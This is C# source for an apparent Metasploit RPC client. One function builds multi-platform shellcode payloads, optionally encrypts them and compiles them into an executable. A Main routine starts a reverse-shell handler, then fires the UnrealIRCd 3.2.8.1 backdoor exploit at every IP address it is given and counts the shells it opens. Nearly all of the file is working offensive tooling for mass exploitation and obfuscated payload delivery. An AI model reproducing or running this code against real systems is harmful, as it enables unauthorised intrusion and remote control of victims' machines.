void HandleClicked(object sender, EventArgs e)
{
string template = string.Empty;
Assembly asm = Assembly.GetExecutingAssembly();
string rsrc = _encrypted.Active ? "MetasploitPayloadUtility.EncryptedTemplate.txt" : "MetasploitPayloadUtility.GeneralTemplate.txt";
using (StreamReader rdr = new StreamReader(asm.GetManifestResourceStream(rsrc)))
template = rdr.ReadToEnd();
string winx64Payload = "payload = new byte[][] {";
string winx86Payload = winx64Payload;
string linx86Payload = winx86Payload;
string linx64Payload = linx86Payload;
MessageDialog md;
try {
if (!_encrypted.Active)
{
foreach (var pair in _newPayloads)
{
pair.Value ["Format"] = "csharp";
var response = _manager.ExecuteModule("payload", pair.Key, pair.Value);
if (response.Count == 6)
{
md = new MessageDialog(this,
DialogFlags.DestroyWithParent,
MessageType.Warning,
ButtonsType.Close, "Generating payload failed.\n\n" + response["error_message"]);
md.Run();
md.Destroy();
return;
}
if (pair.Key.StartsWith("linux/x86") || pair.Key.StartsWith("osx/x86"))
{
linx86Payload += (response ["payload"] as string).Split('=') [1].Replace(";", ",");
}
else if (pair.Key.StartsWith("linux/x64") || pair.Key.StartsWith("osx/x64"))
{
linx64Payload += (response ["payload"] as string).Split('=') [1].Replace(";", ",");
}
else if (pair.Key.StartsWith("windows/x64"))
{
winx64Payload += (response ["payload"] as string).Split('=') [1].Replace(";", ",");
}
else /*windows x86*/
{
winx86Payload += (response ["payload"] as string).Split('=') [1].Replace(";", ",");
}
}
winx64Payload += "};";
winx86Payload += "};";
linx64Payload += "};";
linx86Payload += "};";
//Console.WriteLine (winx64Payload);
//Console.WriteLine (winx86Payload);
//Console.WriteLine (linx64Payload);
//Console.WriteLine (linx86Payload);
}
else
{
byte[] parity = new byte[4];
for (int i = 0; i < 4; i++)
{
parity [i] = Convert.ToByte(Convert.ToInt32(Math.Floor(26 * _random.NextDouble() + 65)));
}
foreach (var pair in _newPayloads)
{
pair.Value ["Format"] = "raw";
var response = _manager.ExecuteModule("payload", pair.Key, pair.Value);
if (response.Count == 6)
{
md = new MessageDialog(this,
DialogFlags.DestroyWithParent,
MessageType.Warning,
ButtonsType.Close, "Generating payload failed.\n\n" + response["error_message"]);
md.Run();
md.Destroy();
return;
}
if (pair.Key.StartsWith("linux/x86") || pair.Key.StartsWith("osx/x86"))
{
byte[] b = response ["payload"] as byte[];
byte[] encb = new byte[b.Length + 4];
encb [0] = parity [0];
encb [1] = parity [1];
encb [2] = parity [2];
encb [3] = parity [3];
for (int i = 4; i < b.Length; i++)
{
encb [i] = b [i - 4];
}
linx86Payload += GetByteArrayString(EncryptData(encb, _random.Next(1023).ToString()));
}
else if (pair.Key.StartsWith("linux/x64") || pair.Key.StartsWith("osx/x64"))
{
byte[] b = response ["payload"] as byte[];
byte[] encb = new byte[b.Length + 4];
encb [0] = parity [0];
encb [1] = parity [1];
encb [2] = parity [2];
encb [3] = parity [3];
for (int i = 4; i < b.Length; i++)
{
encb [i] = b [i - 4];
}
linx64Payload += GetByteArrayString(EncryptData(encb, _random.Next(1023).ToString()));
}
else if (pair.Key.StartsWith("windows/x64"))
{
byte[] b = response ["payload"] as byte[];
byte[] encb = new byte[b.Length + 4];
encb [0] = parity [0];
encb [1] = parity [1];
encb [2] = parity [2];
encb [3] = parity [3];
for (int i = 4; i < b.Length; i++)
{
encb [i] = b [i - 4];
}
winx64Payload += GetByteArrayString(EncryptData(encb, _random.Next(1023).ToString()));
}
else /*windows x86*/
{
byte[] b = response ["payload"] as byte[];
byte[] encb = new byte[b.Length + 4];
encb [0] = parity [0];
encb [1] = parity [1];
encb [2] = parity [2];
encb [3] = parity [3];
for (int i = 4; i < b.Length; i++)
{
encb [i] = b [i - 4];
}
winx86Payload += GetByteArrayString(EncryptData(encb, _random.Next(1023).ToString()));
}
}
winx64Payload += "};";
winx86Payload += "};";
linx64Payload += "};";
linx86Payload += "};";
//Console.WriteLine (winx64Payload);
//Console.WriteLine (winx86Payload);
//Console.WriteLine (linx64Payload);
//Console.WriteLine (linx86Payload);
string par = GetByteArrayString(parity);
template = template.Replace("{{parity}}", par.Remove(par.Length - 1));
}
} catch {
md = new MessageDialog(this,
DialogFlags.DestroyWithParent,
MessageType.Warning,
ButtonsType.Close, "Generating payload failed.\n\nPlease ensure all required (*) options are present and valid.\n\nIf you are sure options are correct, please file a bug.");
md.Run();
md.Destroy();
}
template = template.Replace("{{lin64}}", linx64Payload);
template = template.Replace("{{lin86}}", linx86Payload);
template = template.Replace("{{win64}}", winx64Payload);
template = template.Replace("{{win86}}", winx86Payload);
Guid uid = Guid.NewGuid();
File.WriteAllText(System.IO.Path.GetTempPath() + uid.ToString(), template);
System.Diagnostics.Process process = new System.Diagnostics.Process();
System.Diagnostics.ProcessStartInfo startInfo = new System.Diagnostics.ProcessStartInfo();
startInfo.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden;
startInfo.FileName = "gmcs";
startInfo.Arguments = System.IO.Path.GetTempPath() + uid.ToString();
process.StartInfo = startInfo;
process.Start();
process.WaitForExit();
md = new MessageDialog(this,
DialogFlags.DestroyWithParent,
MessageType.Warning,
ButtonsType.Close, "Your binary is located at: " + System.IO.Path.GetTempPath() + uid.ToString() + ".exe");
md.Run();
md.Destroy();
}
public static void Main(string[] args)
{
using (MetasploitSession session = new MetasploitSession("user", "pass", "http://127.0.0.1:55553/api")) {
if (string.IsNullOrEmpty(session.Token))
{
throw new Exception("Login failed. Check credentials");
}
using (MetasploitManager manager = new MetasploitManager(session)) {
Dictionary <string, object> response = null;
Dictionary <string, object> blah = new Dictionary <string, object> ();
blah ["ExitOnSession"] = "false";
blah ["PAYLOAD"] = "cmd/unix/reverse";
blah ["LHOST"] = "192.168.1.31";
blah ["LPORT"] = "4444";
response = manager.ExecuteModule("exploit", "multi/handler", blah);
object jobID = response ["job_id"];
foreach (string ip in args)
{
Dictionary <string, object> opts = new Dictionary <string, object> ();
opts ["RHOST"] = ip;
opts ["DisablePayloadHandler"] = "true";
opts ["LHOST"] = "192.168.1.31";
opts ["LPORT"] = "4444";
opts ["PAYLOAD"] = "cmd/unix/reverse";
response = manager.ExecuteModule("exploit", "unix/irc/unreal_ircd_3281_backdoor", opts);
}
response = manager.ListJobs();
List <object> vals = new List <object>(response.Values);
while (vals.Contains((object)"Exploit: unix/irc/unreal_ircd_3281_backdoor"))
{
Console.WriteLine("Waiting");
System.Threading.Thread.Sleep(6000);
response = manager.ListJobs();
vals = new List <object> (response.Values);
}
response = manager.StopJob(jobID.ToString());
response = manager.ListSessions();
Console.WriteLine("I popped " + response.Count + " shells. Awesome.");
// foreach (var pair in response) {
// string id = pair.Key;
// Dictionary<string, object> dict = (Dictionary<string, object>)pair.Value;
// if ((dict["type"] as string) == "shell") {
// response = manager.WriteToSessionShell(id, "id\n");
// System.Threading.Thread.Sleep(6000);
// response = manager.ReadSessionShell(id);
//
// Console.WriteLine(response["data"]);
//
// //manager.StopSession(id);
// }
// }
Dictionary <string, object> bl = manager.GetModuleCompatibleSessions("multi/general/execute");
Console.WriteLine("fdsa");
}
}
}
